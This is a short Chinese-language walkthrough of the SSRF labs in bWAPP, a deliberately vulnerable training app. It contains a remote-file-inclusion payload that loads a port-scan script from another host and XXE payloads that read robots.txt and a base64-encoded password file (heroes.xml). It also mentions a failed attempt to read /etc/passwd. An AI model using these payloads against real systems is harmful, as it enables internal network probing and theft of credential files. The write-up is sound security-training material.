SSRF的3個小實驗
bWAPP中的SSRF給出了3個小實驗來說明SSRF的利用場景:
任務1:使用遠程文件包含進行端口掃描(內網探測)
任務2:使用XXE獲取敏感文件中的內容(文件讀取)
任務3:使用XXE進行SmartTV的拒絕服務漏洞的利用(漏洞利用)
任務1:使用遠程文件包含進行端口掃描
點擊任務1中的Port scan可以獲得一份端口掃描的攻擊腳本:http://192.168.163.157/evil/ssrf-1.txt
接下來就是利用bWAPP中的遠程文件包含漏洞,執行端口掃描的腳本。
在Choose your bug中選擇Remote & Local File Inclusion (RFI/LFI)security level選擇low,然后點擊Hack。
觀察Get請求中的參數,發現是典型文件包含問題,language=lang_en.php
payload:?language=http://xxx.xxx.xxx/evil/ssrf-1.txt&action=go
POST:ip=xxxx
任務2:使用XXE獲取敏感文件中的內容
點擊Access獲取XXE的利用腳本:10.158.131.81/bWAPP_latest/evil/ssrf-2.txt
然后切換到XXE漏洞利用環境,點擊Anybugs?,抓包
將選中模塊更改為下面的XML代碼:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "http://localhost/bWAPP_latest/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
使用http協議獲取/bWAPP/robots.txt的內容
使用php協議獲取/bWAPP/passwords/heroes.xml中的經過base64編碼的數據
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
使用file協議獲取bWAPP本機的/etc/passwd的內容。
不知道什么原因。。。
任務3:使用XXE進行SmartTV的拒絕服務漏洞的利用(沒有演示環境)